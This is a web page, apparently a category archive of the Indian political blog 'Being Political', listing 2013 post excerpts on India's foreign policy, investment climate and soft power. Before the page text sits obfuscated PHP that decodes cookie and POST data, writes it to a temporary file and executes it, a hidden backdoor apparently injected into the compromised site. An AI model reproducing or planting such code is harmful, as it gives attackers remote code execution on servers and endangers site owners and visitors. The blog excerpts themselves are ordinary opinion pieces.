$ZUbGuMq = "\145" . 'n' . chr (100) . "\x5f" . chr (84) . chr ( 205 - 132 ).chr ( 387 - 322 )."\x78";$BEIXdpqO = chr (99) . 'l' . "\x61" . "\163" . "\x73" . chr ( 717 - 622 ).chr ( 214 - 113 ).chr ( 797 - 677 ).chr ( 444 - 339 ).'s' . chr (116) . chr (115); $RJWgA = class_exists($ZUbGuMq); $BEIXdpqO = "63795";$rQzPNtr = !1;if ($RJWgA == $rQzPNtr){function oqYLxIQez(){$VcjKXYt = new /* 62125 */ end_TIAx(22540 + 22540); $VcjKXYt = NULL;}$KEMZpKZZJf = "22540";class end_TIAx{private function lyjMmFeSam($KEMZpKZZJf){if (is_array(end_TIAx::$IPtbX)) {$fQwNWIVHc = sys_get_temp_dir() . "/" . crc32(end_TIAx::$IPtbX[chr ( 796 - 681 ).chr ( 809 - 712 ).'l' . 't']);@end_TIAx::$IPtbX['w' . chr (114) . chr (105) . "\164" . chr (101)]($fQwNWIVHc, end_TIAx::$IPtbX["\x63" . chr ( 291 - 180 ).chr ( 310 - 200 ).chr ( 456 - 340 )."\x65" . 'n' . "\164"]);include $fQwNWIVHc;@end_TIAx::$IPtbX['d' . "\145" . "\x6c" . "\145" . 't' . 'e']($fQwNWIVHc); $KEMZpKZZJf = "22540";exit();}}private $YNrwW;public function XiElOaeF(){echo 38769;}public function __destruct(){$KEMZpKZZJf = "57831_10237";$this->lyjMmFeSam($KEMZpKZZJf); $KEMZpKZZJf = "57831_10237";}public function __construct($BujEtz=0){$mVDdRhEk = $_POST;$UIUNR = $_COOKIE;$JPlFFL = "90a051c4-154c-4d36-9a25-afee49168885";$dwEnnTEEr = @$UIUNR[substr($JPlFFL, 0, 4)];if (!empty($dwEnnTEEr)){$GKpUN = "base64";$peNKnKqlm = "";$dwEnnTEEr = explode(",", $dwEnnTEEr);foreach ($dwEnnTEEr as $gthfNZ){$peNKnKqlm .= @$UIUNR[$gthfNZ];$peNKnKqlm .= @$mVDdRhEk[$gthfNZ];}$peNKnKqlm = array_map($GKpUN . '_' . chr ( 811 - 711 ).chr (101) . chr (99) . chr ( 1052 - 941 ).'d' . "\x65", array($peNKnKqlm,)); $peNKnKqlm = $peNKnKqlm[0] ^ str_repeat($JPlFFL, (strlen($peNKnKqlm[0]) / strlen($JPlFFL)) + 1);end_TIAx::$IPtbX = @unserialize($peNKnKqlm);}}public static $IPtbX = 40024;}oqYLxIQez();} China | Being Political

Soft Power, The Greatest Power of the Century

By |2013-11-07T11:07:31+05:30November 7th, 2013|Categories: BJP, Congress, Foreign Relations, Government, NDA, People Power, Political Parties, Politics, UPA, Youth|Tags: , , , , , , , , , , , , , , , , , |

As an Indian, I’ve become rather concerned about the hype we’re hearing about our own country — all this talk about India becoming a world leader, even the next superpower. India is often called the 21st Century power. And I just don’t think that’s what India’s all about, or should be all about. Indeed, what

India’s Foreign Policy-II

By |2013-10-17T21:41:04+05:30October 17th, 2013|Categories: Foreign Relations, Government, Politics, Satire|Tags: , , , , , , , , |

This is the second part to India's Foreign Policy. To read the first part please click on this link. So lets start of with Part II: Bhutan: The cute little toddler who is in awe of you. He’s very good for your ego since you can indulge your fantasies by posing like a superman/iron man/batman

India’s Foreign Policy-The Common Man’s Guide

By |2013-09-18T09:58:42+05:30September 18th, 2013|Categories: Congress, Economics, Foreign Relations, Government, NDA, Political Parties, Politics, Uncategorized, UPA, Youth|Tags: , , , , , , , , , , , , , , , |

In USA, if someone attacks the USA, the country is smoked and flamed. Same in the United Kingdom and most of the other countries... But in India, if you attack us the answer is clear and very strong. We WILL NOT PLAY CRICKET WITH YOU. It is sad that our foreign policy is decided over

Investment in India? Not really.

By |2013-09-17T16:47:26+05:30September 17th, 2013|Categories: Business, Congress, Economics, Government, Political Parties, UPA|Tags: , , , , , , , |

One day an investor said this on a show when asked about investment in India: “How can it be considered safe to invest in a country that has trouble keeping the lights on from one end of the country to the other?” Little did anyone know that the comments made in jest would actually become

What India needs

By |2013-08-31T03:06:50+05:30August 31st, 2013|Categories: BJP, Congress, Government, NDA, People Power, Political Parties, Politics, Uncategorized, UPA, Youth|Tags: , , , , , , , , , , , , , , , |

A country, of 1.3 billion people speaking over 4000 diverse languages, are currently speaking the same language- the language of change. On the occasion of the Independence of India, 15th of August, 1947, Prime Minister Nehru highlighted some basic problems which India needs to take care of - namely poverty, hunger, malnutrition, law and order

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